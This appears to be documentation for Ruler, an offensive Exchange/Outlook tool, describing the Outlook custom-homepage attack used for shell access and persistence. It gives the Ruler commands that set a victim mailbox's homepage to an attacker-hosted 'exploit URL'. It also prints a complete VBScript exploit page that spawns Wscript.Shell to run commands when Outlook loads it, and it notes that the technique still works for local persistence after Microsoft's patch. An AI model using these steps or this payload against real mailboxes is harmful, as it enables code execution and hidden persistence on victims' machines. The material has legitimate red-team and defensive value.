Ruler can get a shell through custom homepages. This is especially useful for persistence, as a homepage can lie dormant in the inbox, nearly undetectable.

The low down on the homepage attack is explained in the Outlook Home Page blog post.

To access the HomePage option, you need to use the homepage command. There are multiple sub-commands to homepage:

• display
• add
• delete

You can view the current homepage value using the display command. This will display the current URL and whether this is active or not.

./ruler --email john@msf.com homepage display

Setting a new homepage couldn't be simpler, you simply use Ruler to set the new homepage to your exploit URL:

./ruler --email john@msf.com homepage add --url "http://yourserver/pew.html"

The homepage attack requires your custom homepage to contain the "exploit", a basic version of this is:

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
 Sub window_onload()
     Set Application = ViewCtl1.OutlookApplication
     Set cmd = Application.CreateObject("Wscript.Shell")
     cmd.Run("notepad")
 End Sub
-->

</script>
</head>
<body>
 <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>

Deleting an existing is done in a similar way to deleting rules.

./ruler --email john@msf.com homepage delete

Microsoft patched this attack by preventing the Homepage from being set remotely. Ben Wilson found that you can still use the homepage for persistence if you have access to the host. He documented this in an excellent blog post: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943